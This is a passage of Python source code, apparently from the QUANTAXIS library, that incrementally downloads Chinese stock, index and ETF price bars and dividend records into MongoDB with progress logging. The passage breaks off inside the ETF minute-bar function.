def QA_SU_save_stock_year(client=DATABASE, ui_log=None, ui_progress=None):
    """save stock_year
    保存年线数据 (save yearly bars for every listed stock)

    Keyword Arguments:
        client {[type]} -- [description] (default: {DATABASE})
        ui_log -- log sink for the Qt GUI (default: {None})
        ui_progress -- progress sink for the Qt GUI (default: {None})
    """
    stock_list = QA_fetch_get_stock_list().code.unique().tolist()
    coll_stock_year = client.stock_year
    # Compound (code, date_stamp) index keeps the incremental lookups fast.
    coll_stock_year.create_index(
        [("code",
          pymongo.ASCENDING),
         ("date_stamp",
          pymongo.ASCENDING)]
    )
    # Codes whose save failed; reported at the end.
    err = []

    def __saving_work(code, coll_stock_year):
        # Incrementally save one code: resume from the last stored date if
        # rows exist, otherwise download everything from 1990-01-01.
        try:
            QA_util_log_info(
                '##JOB01 Now Saving STOCK_YEAR==== {}'.format(str(code)),
                ui_log=ui_log
            )

            ref = coll_stock_year.find({'code': str(code)[0:6]})
            end_date = str(now_time())[0:10]
            if ref.count() > 0:
                # 加入这个判断的原因是因为如果股票是刚上市的 数据库会没有数据 所以会有负索引问题出现
                start_date = ref[ref.count() - 1]['date']

                QA_util_log_info(
                    'UPDATE_STOCK_YEAR \n Trying updating {} from {} to {}'
                    .format(code,
                            start_date,
                            end_date),
                    ui_log=ui_log
                )
                if start_date != end_date:
                    coll_stock_year.insert_many(
                        QA_util_to_json_from_pandas(
                            QA_fetch_get_stock_day(
                                str(code),
                                QA_util_get_next_day(start_date),
                                end_date,
                                '00',
                                frequence='year'
                            )
                        )
                    )
            else:
                start_date = '1990-01-01'
                QA_util_log_info(
                    'UPDATE_STOCK_YEAR \n Trying updating {} from {} to {}'
                    .format(code,
                            start_date,
                            end_date),
                    ui_log=ui_log
                )
                if start_date != end_date:
                    coll_stock_year.insert_many(
                        QA_util_to_json_from_pandas(
                            QA_fetch_get_stock_day(
                                str(code),
                                start_date,
                                end_date,
                                '00',
                                frequence='year'
                            )
                        )
                    )
        # BUG FIX: was a bare `except:`, which also swallows
        # KeyboardInterrupt/SystemExit; catch Exception instead.
        except Exception:
            err.append(str(code))

    for item in range(len(stock_list)):
        QA_util_log_info(
            'The {} of Total {}'.format(item,
                                        len(stock_list)),
            ui_log=ui_log
        )
        strProgress = 'DOWNLOAD PROGRESS {} '.format(
            str(float(item / len(stock_list) * 100))[0:4] + '%'
        )
        intProgress = int(float(item / len(stock_list) * 100))
        QA_util_log_info(
            strProgress,
            ui_log=ui_log,
            ui_progress=ui_progress,
            ui_progress_int_value=intProgress
        )
        __saving_work(stock_list[item], coll_stock_year)

    if len(err) < 1:
        QA_util_log_info('SUCCESS', ui_log=ui_log)
    else:
        QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
        QA_util_log_info(err, ui_log=ui_log)
def QA_SU_save_stock_xdxr(client=DATABASE, ui_log=None, ui_progress=None):
    """save stock_xdxr
    保存除权除息(xdxr)数据 (save dividend/split records for every stock)

    Keyword Arguments:
        client {[type]} -- [description] (default: {DATABASE})
        ui_log -- log sink for the Qt GUI (default: {None})
        ui_progress -- progress sink for the Qt GUI (default: {None})
    """
    stock_list = QA_fetch_get_stock_list().code.unique().tolist()
    # client.drop_collection('stock_xdxr')
    try:
        coll = client.stock_xdxr
        coll.create_index(
            [('code',
              pymongo.ASCENDING),
             ('date',
              pymongo.ASCENDING)],
            unique=True
        )
    # BUG FIX: was a bare `except:`; catch Exception so ctrl-C still works.
    # Creating the unique index can fail if the existing collection already
    # contains duplicate (code, date) rows — rebuild it from scratch.
    except Exception:
        client.drop_collection('stock_xdxr')
        coll = client.stock_xdxr
        coll.create_index(
            [('code',
              pymongo.ASCENDING),
             ('date',
              pymongo.ASCENDING)],
            unique=True
        )
    # Codes whose save failed; reported at the end.
    err = []

    def __saving_work(code, coll):
        # Fetch and insert the xdxr records of one stock. ordered=False lets
        # the insert continue past rows rejected by the unique index.
        QA_util_log_info(
            '##JOB02 Now Saving XDXR INFO ==== {}'.format(str(code)),
            ui_log=ui_log
        )
        try:
            coll.insert_many(
                QA_util_to_json_from_pandas(QA_fetch_get_stock_xdxr(str(code))),
                ordered=False
            )
        # BUG FIX: was a bare `except:`; catch Exception instead. NOTE: with
        # ordered=False a BulkWriteError caused only by duplicates also lands
        # here, so `err` may contain codes that were merely already saved.
        except Exception:
            err.append(str(code))

    for i_ in range(len(stock_list)):
        QA_util_log_info(
            'The {} of Total {}'.format(i_,
                                        len(stock_list)),
            ui_log=ui_log
        )
        strLogInfo = 'DOWNLOAD PROGRESS {} '.format(
            str(float(i_ / len(stock_list) * 100))[0:4] + '%'
        )
        intLogProgress = int(float(i_ / len(stock_list) * 100))
        QA_util_log_info(
            strLogInfo,
            ui_log=ui_log,
            ui_progress=ui_progress,
            ui_progress_int_value=intLogProgress
        )
        __saving_work(stock_list[i_], coll)

    # Consistency fix: report collected failures like the sibling savers do
    # (previously `err` was filled but never surfaced).
    if len(err) < 1:
        QA_util_log_info('SUCCESS', ui_log=ui_log)
    else:
        QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
        QA_util_log_info(err, ui_log=ui_log)
def QA_SU_save_stock_min(client=DATABASE, ui_log=None, ui_progress=None):
    """save stock_min
    保存分钟线数据: for every stock, save 1/5/15/30/60-minute bars,
    incrementally per frequency, using a 4-worker thread pool.

    Keyword Arguments:
        client {[type]} -- [description] (default: {DATABASE})
        ui_log -- log sink for the Qt GUI (default: {None})
        ui_progress -- progress sink for the Qt GUI (default: {None})
    """
    stock_list = QA_fetch_get_stock_list().code.unique().tolist()
    coll = client.stock_min
    # (code, time_stamp, date_stamp) index for incremental minute lookups.
    coll.create_index(
        [
            ('code',
             pymongo.ASCENDING),
            ('time_stamp',
             pymongo.ASCENDING),
            ('date_stamp',
             pymongo.ASCENDING)
        ]
    )
    # Codes whose save failed; reported at the end.
    err = []

    def __saving_work(code, coll):
        # Save all five minute-frequencies for one code; runs on a pool
        # thread. NOTE: the loop variable `type` shadows the builtin.
        QA_util_log_info(
            '##JOB03 Now Saving STOCK_MIN ==== {}'.format(str(code)),
            ui_log=ui_log
        )
        try:
            for type in ['1min', '5min', '15min', '30min', '60min']:
                ref_ = coll.find({'code': str(code)[0:6], 'type': type})
                end_time = str(now_time())[0:19]
                if ref_.count() > 0:
                    # Resume from the last stored datetime for this frequency.
                    start_time = ref_[ref_.count() - 1]['datetime']

                    QA_util_log_info(
                        '##JOB03.{} Now Saving {} from {} to {} =={} '.format(
                            ['1min',
                             '5min',
                             '15min',
                             '30min',
                             '60min'].index(type),
                            str(code),
                            start_time,
                            end_time,
                            type
                        ),
                        ui_log=ui_log
                    )
                    if start_time != end_time:
                        __data = QA_fetch_get_stock_min(
                            str(code),
                            start_time,
                            end_time,
                            type
                        )
                        if len(__data) > 1:
                            # [1::] drops the first record, which is the
                            # already-stored bar at start_time.
                            coll.insert_many(
                                QA_util_to_json_from_pandas(__data)[1::]
                            )
                else:
                    # No rows for this frequency yet: full download from 2015.
                    start_time = '2015-01-01'
                    QA_util_log_info(
                        '##JOB03.{} Now Saving {} from {} to {} =={} '.format(
                            ['1min',
                             '5min',
                             '15min',
                             '30min',
                             '60min'].index(type),
                            str(code),
                            start_time,
                            end_time,
                            type
                        ),
                        ui_log=ui_log
                    )
                    if start_time != end_time:
                        __data = QA_fetch_get_stock_min(
                            str(code),
                            start_time,
                            end_time,
                            type
                        )
                        if len(__data) > 1:
                            coll.insert_many(
                                QA_util_to_json_from_pandas(__data)
                            )
        except Exception as e:
            QA_util_log_info(e, ui_log=ui_log)
            err.append(code)
            QA_util_log_info(err, ui_log=ui_log)

    # Fan out one task per code; as_completed below drives the progress UI.
    executor = ThreadPoolExecutor(max_workers=4)
    # executor.map((__saving_work, stock_list[i_], coll),URLS)
    res = {
        executor.submit(__saving_work,
                        stock_list[i_],
                        coll)
        for i_ in range(len(stock_list))
    }
    count = 0
    for i_ in concurrent.futures.as_completed(res):
        QA_util_log_info(
            'The {} of Total {}'.format(count,
                                        len(stock_list)),
            ui_log=ui_log
        )

        strProgress = 'DOWNLOAD PROGRESS {} '.format(
            str(float(count / len(stock_list) * 100))[0:4] + '%'
        )
        # NOTE(review): scaled by 10000 here while the day savers use 100 —
        # presumably a 0-10000 progress-bar range; confirm against the GUI.
        intProgress = int(count / len(stock_list) * 10000.0)
        QA_util_log_info(
            strProgress,
            ui_log,
            ui_progress=ui_progress,
            ui_progress_int_value=intProgress
        )
        count = count + 1
    if len(err) < 1:
        QA_util_log_info('SUCCESS', ui_log=ui_log)
    else:
        QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
        QA_util_log_info(err, ui_log=ui_log)
def QA_SU_save_single_stock_min(code : str, client=DATABASE, ui_log=None, ui_progress=None):
    """save single stock_min
    保存单个股票的分钟线数据 (save 1/5/15/30/60-minute bars for one code)

    Keyword Arguments:
        code -- the single stock code to save
        client {[type]} -- [description] (default: {DATABASE})
        ui_log -- log sink for the Qt GUI (default: {None})
        ui_progress -- progress sink for the Qt GUI (default: {None})
    """
    #stock_list = QA_fetch_get_stock_list().code.unique().tolist()
    stock_list = [code]
    coll = client.stock_min
    # (code, time_stamp, date_stamp) index for incremental minute lookups.
    coll.create_index(
        [
            ('code',
             pymongo.ASCENDING),
            ('time_stamp',
             pymongo.ASCENDING),
            ('date_stamp',
             pymongo.ASCENDING)
        ]
    )
    # Codes whose save failed; reported at the end.
    err = []

    def __saving_work(code, coll):
        # Save all five minute-frequencies for one code; runs on a pool
        # thread. NOTE: the loop variable `type` shadows the builtin.
        QA_util_log_info(
            '##JOB03 Now Saving STOCK_MIN ==== {}'.format(str(code)),
            ui_log=ui_log
        )
        try:
            for type in ['1min', '5min', '15min', '30min', '60min']:
                ref_ = coll.find({'code': str(code)[0:6], 'type': type})
                end_time = str(now_time())[0:19]
                if ref_.count() > 0:
                    # Resume from the last stored datetime for this frequency.
                    start_time = ref_[ref_.count() - 1]['datetime']

                    QA_util_log_info(
                        '##JOB03.{} Now Saving {} from {} to {} =={} '.format(
                            ['1min',
                             '5min',
                             '15min',
                             '30min',
                             '60min'].index(type),
                            str(code),
                            start_time,
                            end_time,
                            type
                        ),
                        ui_log=ui_log
                    )
                    if start_time != end_time:
                        __data = QA_fetch_get_stock_min(
                            str(code),
                            start_time,
                            end_time,
                            type
                        )
                        if len(__data) > 1:
                            # [1::] drops the first record, which is the
                            # already-stored bar at start_time.
                            coll.insert_many(
                                QA_util_to_json_from_pandas(__data)[1::]
                            )
                else:
                    # No rows for this frequency yet: full download from 2015.
                    start_time = '2015-01-01'
                    QA_util_log_info(
                        '##JOB03.{} Now Saving {} from {} to {} =={} '.format(
                            ['1min',
                             '5min',
                             '15min',
                             '30min',
                             '60min'].index(type),
                            str(code),
                            start_time,
                            end_time,
                            type
                        ),
                        ui_log=ui_log
                    )
                    if start_time != end_time:
                        __data = QA_fetch_get_stock_min(
                            str(code),
                            start_time,
                            end_time,
                            type
                        )
                        if len(__data) > 1:
                            coll.insert_many(
                                QA_util_to_json_from_pandas(__data)
                            )
        except Exception as e:
            QA_util_log_info(e, ui_log=ui_log)
            err.append(code)
            QA_util_log_info(err, ui_log=ui_log)

    executor = ThreadPoolExecutor(max_workers=4)
    # executor.map((__saving_work, stock_list[i_], coll),URLS)
    res = {
        executor.submit(__saving_work,
                        stock_list[i_],
                        coll)
        for i_ in range(len(stock_list))
    }
    # BUG FIX: the counter started at 1 here (unlike QA_SU_save_stock_min),
    # making the progress log off by one ('The 1 of Total 1' before done).
    count = 0
    for i_ in concurrent.futures.as_completed(res):
        QA_util_log_info(
            'The {} of Total {}'.format(count,
                                        len(stock_list)),
            ui_log=ui_log
        )

        strProgress = 'DOWNLOAD PROGRESS {} '.format(
            str(float(count / len(stock_list) * 100))[0:4] + '%'
        )
        intProgress = int(count / len(stock_list) * 10000.0)
        QA_util_log_info(
            strProgress,
            ui_log,
            ui_progress=ui_progress,
            ui_progress_int_value=intProgress
        )
        count = count + 1
    if len(err) < 1:
        QA_util_log_info('SUCCESS', ui_log=ui_log)
    else:
        QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
        QA_util_log_info(err, ui_log=ui_log)
def QA_SU_save_single_index_day(code : str, client=DATABASE, ui_log=None):
    """save index_day
    保存单个指数的日线数据 (save daily bars for one index code)

    Keyword Arguments:
        code : single index code
        client {[type]} -- [description] (default: {DATABASE})
        ui_log -- log sink for the Qt GUI (default: {None})
    """
    #__index_list = QA_fetch_get_stock_list('index')
    coll = client.index_day
    # Compound (code, date_stamp) index keeps the incremental lookups fast.
    coll.create_index(
        [('code',
          pymongo.ASCENDING),
         ('date_stamp',
          pymongo.ASCENDING)]
    )
    # Codes whose save failed; reported at the end.
    err = []

    def __saving_work(code, coll):
        try:
            ref_ = coll.find({'code': str(code)[0:6]})
            end_time = str(now_time())[0:10]
            if ref_.count() > 0:
                # Incremental update from the last stored date.
                start_time = ref_[ref_.count() - 1]['date']

                QA_util_log_info(
                    '##JOB04 Now Saving INDEX_DAY==== \n Trying updating {} from {} to {}'
                    .format(code,
                            start_time,
                            end_time),
                    ui_log=ui_log
                )

                if start_time != end_time:
                    coll.insert_many(
                        QA_util_to_json_from_pandas(
                            QA_fetch_get_index_day(
                                str(code),
                                QA_util_get_next_day(start_time),
                                end_time
                            )
                        )
                    )
            else:
                # No local data: try a full download from 1990; if the source
                # cannot serve that range, fall back to 2009.
                try:
                    start_time = '1990-01-01'
                    QA_util_log_info(
                        '##JOB04 Now Saving INDEX_DAY==== \n Trying updating {} from {} to {}'
                        .format(code,
                                start_time,
                                end_time),
                        ui_log=ui_log
                    )

                    coll.insert_many(
                        QA_util_to_json_from_pandas(
                            QA_fetch_get_index_day(
                                str(code),
                                start_time,
                                end_time
                            )
                        )
                    )
                # BUG FIX: was a bare `except:`, which also swallows
                # KeyboardInterrupt/SystemExit; catch Exception instead.
                except Exception:
                    start_time = '2009-01-01'
                    QA_util_log_info(
                        '##JOB04 Now Saving INDEX_DAY==== \n Trying updating {} from {} to {}'
                        .format(code,
                                start_time,
                                end_time),
                        ui_log=ui_log
                    )

                    coll.insert_many(
                        QA_util_to_json_from_pandas(
                            QA_fetch_get_index_day(
                                str(code),
                                start_time,
                                end_time
                            )
                        )
                    )
        except Exception as e:
            QA_util_log_info(e, ui_log=ui_log)
            err.append(str(code))
            QA_util_log_info(err, ui_log=ui_log)

    __saving_work(code, coll)

    if len(err) < 1:
        QA_util_log_info('SUCCESS', ui_log=ui_log)
    else:
        QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
        QA_util_log_info(err, ui_log=ui_log)
def QA_SU_save_index_day(client=DATABASE, ui_log=None, ui_progress=None):
    """save index_day
    保存指数日线数据 (save daily bars for every index)

    Keyword Arguments:
        client {[type]} -- [description] (default: {DATABASE})
        ui_log -- log sink for the Qt GUI (default: {None})
        ui_progress -- progress sink for the Qt GUI (default: {None})
    """
    __index_list = QA_fetch_get_stock_list('index')
    coll = client.index_day
    # Compound (code, date_stamp) index keeps the incremental lookups fast.
    coll.create_index(
        [('code',
          pymongo.ASCENDING),
         ('date_stamp',
          pymongo.ASCENDING)]
    )
    # Codes whose save failed; reported at the end.
    err = []

    def __saving_work(code, coll):
        try:
            ref_ = coll.find({'code': str(code)[0:6]})
            end_time = str(now_time())[0:10]
            if ref_.count() > 0:
                # Incremental update from the last stored date.
                start_time = ref_[ref_.count() - 1]['date']

                QA_util_log_info(
                    '##JOB04 Now Saving INDEX_DAY==== \n Trying updating {} from {} to {}'
                    .format(code,
                            start_time,
                            end_time),
                    ui_log=ui_log
                )

                if start_time != end_time:
                    coll.insert_many(
                        QA_util_to_json_from_pandas(
                            QA_fetch_get_index_day(
                                str(code),
                                QA_util_get_next_day(start_time),
                                end_time
                            )
                        )
                    )
            else:
                # No local data: try a full download from 1990; if the source
                # cannot serve that range, fall back to 2009.
                try:
                    start_time = '1990-01-01'
                    QA_util_log_info(
                        '##JOB04 Now Saving INDEX_DAY==== \n Trying updating {} from {} to {}'
                        .format(code,
                                start_time,
                                end_time),
                        ui_log=ui_log
                    )

                    coll.insert_many(
                        QA_util_to_json_from_pandas(
                            QA_fetch_get_index_day(
                                str(code),
                                start_time,
                                end_time
                            )
                        )
                    )
                # BUG FIX: was a bare `except:`, which also swallows
                # KeyboardInterrupt/SystemExit; catch Exception instead.
                except Exception:
                    start_time = '2009-01-01'
                    QA_util_log_info(
                        '##JOB04 Now Saving INDEX_DAY==== \n Trying updating {} from {} to {}'
                        .format(code,
                                start_time,
                                end_time),
                        ui_log=ui_log
                    )

                    coll.insert_many(
                        QA_util_to_json_from_pandas(
                            QA_fetch_get_index_day(
                                str(code),
                                start_time,
                                end_time
                            )
                        )
                    )
        except Exception as e:
            QA_util_log_info(e, ui_log=ui_log)
            err.append(str(code))
            QA_util_log_info(err, ui_log=ui_log)

    for i_ in range(len(__index_list)):
        # __saving_work('000001')
        QA_util_log_info(
            'The {} of Total {}'.format(i_,
                                        len(__index_list)),
            ui_log=ui_log
        )

        strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
            str(float(i_ / len(__index_list) * 100))[0:4] + '%'
        )
        intLogProgress = int(float(i_ / len(__index_list) * 10000.0))
        QA_util_log_info(
            strLogProgress,
            ui_log=ui_log,
            ui_progress=ui_progress,
            ui_progress_int_value=intLogProgress
        )
        # __index_list is indexed by a (code, market) MultiIndex; [0] is code.
        __saving_work(__index_list.index[i_][0], coll)

    if len(err) < 1:
        QA_util_log_info('SUCCESS', ui_log=ui_log)
    else:
        QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
        QA_util_log_info(err, ui_log=ui_log)
def QA_SU_save_index_min(client=DATABASE, ui_log=None, ui_progress=None):
    """save index_min
    保存指数分钟线数据: for every index, save 1/5/15/30/60-minute bars,
    incrementally per frequency, using a 4-worker thread pool.

    Keyword Arguments:
        client {[type]} -- [description] (default: {DATABASE})
        ui_log -- log sink for the Qt GUI (default: {None})
        ui_progress -- progress sink for the Qt GUI (default: {None})
    """
    __index_list = QA_fetch_get_stock_list('index')
    coll = client.index_min
    # (code, time_stamp, date_stamp) index for incremental minute lookups.
    coll.create_index(
        [
            ('code',
             pymongo.ASCENDING),
            ('time_stamp',
             pymongo.ASCENDING),
            ('date_stamp',
             pymongo.ASCENDING)
        ]
    )
    # Codes whose save failed; reported at the end.
    err = []

    def __saving_work(code, coll):
        # Save all five minute-frequencies for one index; runs on a pool
        # thread. NOTE: the loop variable `type` shadows the builtin.
        QA_util_log_info(
            '##JOB05 Now Saving Index_MIN ==== {}'.format(str(code)),
            ui_log=ui_log
        )
        try:
            for type in ['1min', '5min', '15min', '30min', '60min']:
                ref_ = coll.find({'code': str(code)[0:6], 'type': type})
                end_time = str(now_time())[0:19]
                if ref_.count() > 0:
                    # Resume from the last stored datetime for this frequency.
                    start_time = ref_[ref_.count() - 1]['datetime']

                    QA_util_log_info(
                        '##JOB05.{} Now Saving {} from {} to {} =={} '.format(
                            ['1min',
                             '5min',
                             '15min',
                             '30min',
                             '60min'].index(type),
                            str(code),
                            start_time,
                            end_time,
                            type
                        ),
                        ui_log=ui_log
                    )
                    if start_time != end_time:
                        __data = QA_fetch_get_index_min(
                            str(code),
                            start_time,
                            end_time,
                            type
                        )
                        if len(__data) > 1:
                            # Drop the first row, the already-stored bar at
                            # start_time.
                            coll.insert_many(
                                QA_util_to_json_from_pandas(__data[1::])
                            )
                else:
                    # No rows for this frequency yet: full download from 2015.
                    start_time = '2015-01-01'
                    QA_util_log_info(
                        '##JOB05.{} Now Saving {} from {} to {} =={} '.format(
                            ['1min',
                             '5min',
                             '15min',
                             '30min',
                             '60min'].index(type),
                            str(code),
                            start_time,
                            end_time,
                            type
                        ),
                        ui_log=ui_log
                    )
                    if start_time != end_time:
                        __data = QA_fetch_get_index_min(
                            str(code),
                            start_time,
                            end_time,
                            type
                        )
                        if len(__data) > 1:
                            coll.insert_many(
                                QA_util_to_json_from_pandas(__data)
                            )
        # BUG FIX: was a bare `except:`, which also swallows
        # KeyboardInterrupt/SystemExit; catch Exception instead.
        except Exception:
            err.append(code)

    executor = ThreadPoolExecutor(max_workers=4)
    res = {
        executor.submit(__saving_work,
                        __index_list.index[i_][0],
                        coll)
        for i_ in range(len(__index_list))
    }  # multi index ./.
    count = 0
    for i_ in concurrent.futures.as_completed(res):
        strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
            str(float(count / len(__index_list) * 100))[0:4] + '%'
        )
        intLogProgress = int(float(count / len(__index_list) * 10000.0))
        QA_util_log_info(
            'The {} of Total {}'.format(count,
                                        len(__index_list)),
            ui_log=ui_log
        )
        QA_util_log_info(
            strLogProgress,
            ui_log=ui_log,
            ui_progress=ui_progress,
            ui_progress_int_value=intLogProgress
        )
        count = count + 1
    if len(err) < 1:
        QA_util_log_info('SUCCESS', ui_log=ui_log)
    else:
        QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
        QA_util_log_info(err, ui_log=ui_log)
def QA_SU_save_single_index_min(code : str, client=DATABASE, ui_log=None, ui_progress=None):
    """save single index_min

    Incrementally downloads 1/5/15/30/60-minute bars of one index into
    the ``index_min`` collection, resuming each frequency from the last
    stored ``datetime``.

    Keyword Arguments:
        code -- single index code
        client {[type]} -- [description] (default: {DATABASE})
        ui_log -- optional UI log hook forwarded to QA_util_log_info
        ui_progress -- optional UI progress hook
    """
    #__index_list = QA_fetch_get_stock_list('index')
    __index_list = [code]
    coll = client.index_min
    coll.create_index(
        [
            ('code',
             pymongo.ASCENDING),
            ('time_stamp',
             pymongo.ASCENDING),
            ('date_stamp',
             pymongo.ASCENDING)
        ]
    )
    err = []
    # maintained bar frequencies; the list position doubles as the JOB05 sub-id
    frequences = ['1min', '5min', '15min', '30min', '60min']

    def __saving_work(code, coll):
        QA_util_log_info(
            '##JOB05 Now Saving Index_MIN ==== {}'.format(str(code)),
            ui_log=ui_log
        )
        try:
            for frequence in frequences:
                ref_ = coll.find({'code': str(code)[0:6], 'type': frequence})
                end_time = str(now_time())[0:19]
                if ref_.count() > 0:
                    # resume from the last stored bar; the first fetched row
                    # duplicates the stored one, hence the [1::] slice below
                    start_time = ref_[ref_.count() - 1]['datetime']
                    QA_util_log_info(
                        '##JOB05.{} Now Saving {} from {} to {} =={} '.format(
                            frequences.index(frequence),
                            str(code),
                            start_time,
                            end_time,
                            frequence
                        ),
                        ui_log=ui_log
                    )
                    if start_time != end_time:
                        __data = QA_fetch_get_index_min(
                            str(code),
                            start_time,
                            end_time,
                            frequence
                        )
                        if len(__data) > 1:
                            coll.insert_many(
                                QA_util_to_json_from_pandas(__data[1::])
                            )
                else:
                    # nothing stored yet for this (code, frequence):
                    # download from the fixed initial date
                    start_time = '2015-01-01'
                    QA_util_log_info(
                        '##JOB05.{} Now Saving {} from {} to {} =={} '.format(
                            frequences.index(frequence),
                            str(code),
                            start_time,
                            end_time,
                            frequence
                        ),
                        ui_log=ui_log
                    )
                    if start_time != end_time:
                        __data = QA_fetch_get_index_min(
                            str(code),
                            start_time,
                            end_time,
                            frequence
                        )
                        if len(__data) > 1:
                            coll.insert_many(
                                QA_util_to_json_from_pandas(__data)
                            )
        except Exception as e:
            # record the failing code but keep going; log the reason
            # instead of silently swallowing it
            QA_util_log_info(e, ui_log=ui_log)
            err.append(code)

    # the context manager guarantees the pool is shut down when done
    with ThreadPoolExecutor(max_workers=4) as executor:
        res = {
            executor.submit(__saving_work,
                            __index_list[i_],
                            coll)
            for i_ in range(len(__index_list))
        }  # multi index ./.
        count = 1
        for i_ in concurrent.futures.as_completed(res):
            strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
                str(float(count / len(__index_list) * 100))[0:4] + '%'
            )
            intLogProgress = int(float(count / len(__index_list) * 10000.0))
            QA_util_log_info(
                'The {} of Total {}'.format(count,
                                            len(__index_list)),
                ui_log=ui_log
            )
            QA_util_log_info(
                strLogProgress,
                ui_log=ui_log,
                ui_progress=ui_progress,
                ui_progress_int_value=intLogProgress
            )
            count = count + 1
    if len(err) < 1:
        QA_util_log_info('SUCCESS', ui_log=ui_log)
    else:
        QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
        QA_util_log_info(err, ui_log=ui_log)
def QA_SU_save_single_etf_day(code : str, client=DATABASE, ui_log=None):
    """save etf_day

    Incrementally saves the daily bars of one ETF into the ``index_day``
    collection (ETF dailies share that collection), resuming from the
    last stored ``date``.

    Keyword Arguments:
        code : single etf code
        client {[type]} -- [description] (default: {DATABASE})
        ui_log -- optional UI log hook forwarded to QA_util_log_info
    """
    #__index_list = QA_fetch_get_stock_list('etf')
    coll = client.index_day
    coll.create_index(
        [('code',
          pymongo.ASCENDING),
         ('date_stamp',
          pymongo.ASCENDING)]
    )
    err = []

    def __saving_work(code, coll):
        try:
            ref_ = coll.find({'code': str(code)[0:6]})
            end_time = str(now_time())[0:10]
            if ref_.count() > 0:
                # resume from the day after the last stored bar
                start_time = ref_[ref_.count() - 1]['date']
                QA_util_log_info(
                    '##JOB06 Now Saving ETF_DAY==== \n Trying updating {} from {} to {}'
                    .format(code,
                            start_time,
                            end_time),
                    ui_log=ui_log
                )
                if start_time != end_time:
                    coll.insert_many(
                        QA_util_to_json_from_pandas(
                            QA_fetch_get_index_day(
                                str(code),
                                QA_util_get_next_day(start_time),
                                end_time
                            )
                        )
                    )
            else:
                # nothing stored yet: download the whole history
                start_time = '1990-01-01'
                QA_util_log_info(
                    '##JOB06 Now Saving ETF_DAY==== \n Trying updating {} from {} to {}'
                    .format(code,
                            start_time,
                            end_time),
                    ui_log=ui_log
                )
                if start_time != end_time:
                    coll.insert_many(
                        QA_util_to_json_from_pandas(
                            QA_fetch_get_index_day(
                                str(code),
                                start_time,
                                end_time
                            )
                        )
                    )
        except Exception as e:
            # log the reason instead of silently swallowing it
            QA_util_log_info(e, ui_log=ui_log)
            err.append(str(code))

    __saving_work(code, coll)
    if len(err) < 1:
        QA_util_log_info('SUCCESS', ui_log=ui_log)
    else:
        QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
        QA_util_log_info(err, ui_log=ui_log)
def QA_SU_save_etf_day(client=DATABASE, ui_log=None, ui_progress=None):
    """save etf_day

    Incrementally saves daily bars of every ETF into the ``index_day``
    collection (ETF dailies share that collection), resuming each code
    from the last stored ``date``.

    Keyword Arguments:
        client {[type]} -- [description] (default: {DATABASE})
        ui_log -- optional UI log hook forwarded to QA_util_log_info
        ui_progress -- optional UI progress hook
    """
    __index_list = QA_fetch_get_stock_list('etf')
    coll = client.index_day
    coll.create_index(
        [('code',
          pymongo.ASCENDING),
         ('date_stamp',
          pymongo.ASCENDING)]
    )
    err = []

    def __saving_work(code, coll):
        try:
            ref_ = coll.find({'code': str(code)[0:6]})
            end_time = str(now_time())[0:10]
            if ref_.count() > 0:
                # resume from the day after the last stored bar
                start_time = ref_[ref_.count() - 1]['date']
                QA_util_log_info(
                    '##JOB06 Now Saving ETF_DAY==== \n Trying updating {} from {} to {}'
                    .format(code,
                            start_time,
                            end_time),
                    ui_log=ui_log
                )
                if start_time != end_time:
                    coll.insert_many(
                        QA_util_to_json_from_pandas(
                            QA_fetch_get_index_day(
                                str(code),
                                QA_util_get_next_day(start_time),
                                end_time
                            )
                        )
                    )
            else:
                # nothing stored yet: download the whole history
                start_time = '1990-01-01'
                QA_util_log_info(
                    '##JOB06 Now Saving ETF_DAY==== \n Trying updating {} from {} to {}'
                    .format(code,
                            start_time,
                            end_time),
                    ui_log=ui_log
                )
                if start_time != end_time:
                    coll.insert_many(
                        QA_util_to_json_from_pandas(
                            QA_fetch_get_index_day(
                                str(code),
                                start_time,
                                end_time
                            )
                        )
                    )
        except Exception as e:
            # log the reason instead of silently swallowing it
            QA_util_log_info(e, ui_log=ui_log)
            err.append(str(code))

    for i_ in range(len(__index_list)):
        # __saving_work('000001')
        QA_util_log_info(
            'The {} of Total {}'.format(i_,
                                        len(__index_list)),
            ui_log=ui_log
        )
        strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
            str(float(i_ / len(__index_list) * 100))[0:4] + '%'
        )
        intLogProgress = int(float(i_ / len(__index_list) * 10000.0))
        QA_util_log_info(
            strLogProgress,
            ui_log=ui_log,
            ui_progress=ui_progress,
            ui_progress_int_value=intLogProgress
        )
        __saving_work(__index_list.index[i_][0], coll)
    if len(err) < 1:
        QA_util_log_info('SUCCESS', ui_log=ui_log)
    else:
        QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
        QA_util_log_info(err, ui_log=ui_log)
def QA_SU_save_etf_min(client=DATABASE, ui_log=None, ui_progress=None):
    """save etf_min

    Incrementally downloads 1/5/15/30/60-minute ETF bars into the
    ``index_min`` collection, resuming each (code, frequency) pair from
    the last stored ``datetime``.

    Keyword Arguments:
        client {[type]} -- [description] (default: {DATABASE})
        ui_log -- optional UI log hook forwarded to QA_util_log_info
        ui_progress -- optional UI progress hook
    """
    __index_list = QA_fetch_get_stock_list('etf')
    coll = client.index_min
    coll.create_index(
        [
            ('code',
             pymongo.ASCENDING),
            ('time_stamp',
             pymongo.ASCENDING),
            ('date_stamp',
             pymongo.ASCENDING)
        ]
    )
    err = []
    # maintained bar frequencies; the list position doubles as the JOB07 sub-id
    frequences = ['1min', '5min', '15min', '30min', '60min']

    def __saving_work(code, coll):
        QA_util_log_info(
            '##JOB07 Now Saving ETF_MIN ==== {}'.format(str(code)),
            ui_log=ui_log
        )
        try:
            for frequence in frequences:
                ref_ = coll.find({'code': str(code)[0:6], 'type': frequence})
                end_time = str(now_time())[0:19]
                if ref_.count() > 0:
                    # resume from the last stored bar; the first fetched row
                    # duplicates the stored one, hence the [1::] slice below
                    start_time = ref_[ref_.count() - 1]['datetime']
                    QA_util_log_info(
                        '##JOB07.{} Now Saving {} from {} to {} =={} '.format(
